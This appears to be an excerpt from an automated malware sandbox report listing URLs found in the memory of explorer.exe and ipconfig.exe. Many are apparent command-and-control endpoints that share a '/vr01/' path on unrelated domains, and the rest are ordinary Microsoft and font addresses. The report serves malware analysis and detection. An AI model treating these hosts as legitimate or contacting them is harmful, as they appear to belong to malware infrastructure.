              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laneflowlogistics.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laneflowlogistics.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laneflowlogistics.com/vr01/www.familyofficesheet.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laneflowlogistics.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.makeyousurprise.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.makeyousurprise.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.makeyousurprise.com/vr01/www.helyibudapest.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.makeyousurprise.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayorii.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayorii.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayorii.com/vr01/www.flavorfog.online
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayorii.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michellecaldwelldesign.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michellecaldwelldesign.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michellecaldwelldesign.com/vr01/www.accidentapp.online
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michellecaldwelldesign.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nicholsonflooringservices.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nicholsonflooringservices.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nicholsonflooringservices.com/vr01/www.hsyxkj.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nicholsonflooringservices.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz/vr01/www.michellecaldwelldesign.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.bizReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz/vr01/www.gratiasempirellc.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyzReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online/vr01/www.nicholsonflooringservices.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.onlineReferer:
              Source: explorer.exe, 00000002.00000003.3096071926.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4454886902.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780399973.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2005015223.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
              Source: explorer.exe, 00000002.00000000.1994801802.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
              Source: explorer.exe, 00000002.00000000.1994801802.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4449747928.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
              Source: explorer.exe, 00000002.00000003.3094297906.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4448308637.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1993050784.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
              Source: explorer.exe, 00000002.00000003.3094901918.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094735270.0000000009B85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4452782293.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3779046751.0000000009B8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780787324.0000000009C21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u-w4BMUTPHjxsIPy-vNiPg7MU0.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30wWyWrFCbw7A.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxswWyWrFCbw7A.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50Xew-FGC_p9dw.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVew-FGC_p9dw.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USew-FGC_p9dw.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wiPHA3s5dwt7w.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wqPHA3s5dwt7w.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2PHA3s5dwt7w.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHvxk6XweuBCY.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Uw-Y3tcoqK5.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk0ZjaVc
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkaVc
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkaVc
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk_RkaVc
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkxhjaVc
